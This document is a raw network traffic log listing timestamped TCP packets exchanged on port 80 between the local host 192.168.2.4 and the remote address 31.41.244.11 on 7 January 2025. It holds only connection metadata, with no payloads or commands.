Jan 7, 2025 10:09:02.747827053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747837067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.747839928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747857094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747869015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747874975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.747874975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.747884989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747901917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747915030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.747920036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747932911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747944117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.747946978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.747958899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748024940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748152971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748171091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748183012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748199940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748212099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748225927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748225927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748229027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748243093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748264074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748265028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748276949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748289108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748306990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748306990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748348951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748363018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748373985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748384953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748385906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748384953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748398066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748444080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748444080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748457909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748465061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748471022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748481989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748490095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748496056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748502016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748507977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748513937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748519897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748526096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748531103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748538017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748544931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748567104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748583078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748595953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748706102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748713970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748713970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748717070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748735905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748747110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748759985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748768091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748771906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748795033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748809099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748811007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748811007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748825073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748831034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748836994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.748852968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748867035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748892069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.748914957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749320030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749385118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749397039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749406099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749416113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749429941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749437094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749448061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749461889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749461889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749475956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749485970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749485970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749488115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.749511003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.749543905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.782953024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.782972097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.782984018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783005953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783076048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783076048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783076048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783088923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783099890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783145905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783155918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783159971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783170938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783181906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783206940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783210993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783242941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783261061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783281088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783293962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783307076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.783334970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783344984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.783355951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.785989046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786009073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786020994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786045074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.786078930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786081076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.786099911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786112070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786123037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786128998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.786134005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.786154032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.786207914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.786207914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.807857990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807873011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807892084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807904959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807918072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807928085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807934999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807940960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.807955027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.808026075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834244967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834255934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834274054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834290981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834302902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834301949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834315062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834327936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834347963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834352970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834367037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834368944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834383965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834408998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834419966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834429979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834446907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834460020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834481955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834494114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834494114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834511042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834567070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834578037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834645987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834652901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834671021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834685087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834695101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834697962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834724903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834724903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834747076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834827900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834840059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834851027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834861994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834872961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834875107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834892035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834928989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834932089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834944010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834955931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834969997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834981918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.834981918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.834994078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835006952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835010052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835058928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835058928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835063934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835076094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835088015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835098982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835134983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835160017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835180044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835191965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835202932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835213900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835227013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835232019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835237980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835242033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835251093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835263968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835283041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835283041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835305929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835431099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835442066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835453987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835463047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835475922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835519075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835521936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835530996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835544109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835555077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835566998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835570097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835594893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835665941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835678101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835679054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835697889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835710049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835721970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835727930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835735083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835745096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835745096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835758924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835772991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835778952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835792065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.835819960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.835834980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836009979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836020947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836033106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836044073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836055040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836056948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836067915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836072922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836081028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836097956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836110115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836118937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836118937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836122990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836137056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836153984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836168051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836209059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836287022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836298943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836309910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836323977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836334944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836345911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836354017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836354017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836358070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836391926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836395025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836405039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836410046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836420059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836431980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836441994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836452007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836452007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836452961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836467981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.836500883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836500883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.836518049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.869750977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869765043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869776964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869795084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869806051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869817019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869832993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.869883060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.869894981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869906902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869919062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869934082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869947910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869954109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.869970083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.869978905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.869997025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.870027065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.870038033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.870038986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.870049953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.870085955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.870085955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.870121956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.872786999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872800112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872817039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872822046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872876883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.872876883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.872939110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872956991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872967958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872978926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.872997999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.873037100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.894578934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894591093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894603968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894642115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894654036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894659042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.894659042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.894666910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894678116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.894679070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.894706011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.894718885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927277088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927293062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927310944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927350998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927373886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927386999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927433968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.927478075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927532911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.927556992 CET	50017	80	192.168.2.4	31.41.244.11
